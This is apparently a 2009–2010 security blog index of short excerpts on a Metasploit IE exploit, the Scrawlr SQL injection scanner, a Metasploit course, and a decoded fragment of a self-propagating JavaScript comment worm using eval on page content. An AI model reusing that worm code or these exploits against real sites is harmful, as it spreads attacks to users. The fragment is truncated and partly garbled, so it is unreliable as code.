Sunday, January 17th, 2010 While I was updating my VMs today with the final version of BackTrack 4 I decided to jump in and take a look at the new IE 0day exploit that was added to MetaSploit a couple of days ago. It works surprisingly well. I had 100% success rate with IE6. ...
Posted in Coding, Internet, Security, Software, Windows | 1 Comment
Wednesday, October 28th, 2009 Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology ...
Posted in Coding, Internet, Security, Software | No Comments
Monday, September 28th, 2009 This free information security training is brought to you in a community effort to promote awareness and raise funds for underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework.http://www.offensive-security.com/metasploit-unleashed/
Posted in Coding, Internet, Linux, Privacy, Security, Software, Windows | No Comments
Sunday, September 27th, 2009 Well, all that URL-encoded text in the links evaluates to something functionally equivalent to this:
nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";elements = document.getElementsByTagName('a');
for (i = 0; i < elements.length; i++) {
if (elements[i].innerHTML == 'reply') ...
Posted in Coding, Internet | 1 Comment
Tuesday, September 22nd, 2009 Here is another awesome blog post from Jeff Moser over at Moserware. It's literally a stick figure guide to AES. A must-read. Even if you don't quite understand it.http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Posted in Coding, General BS, Privacy, Security | No Comments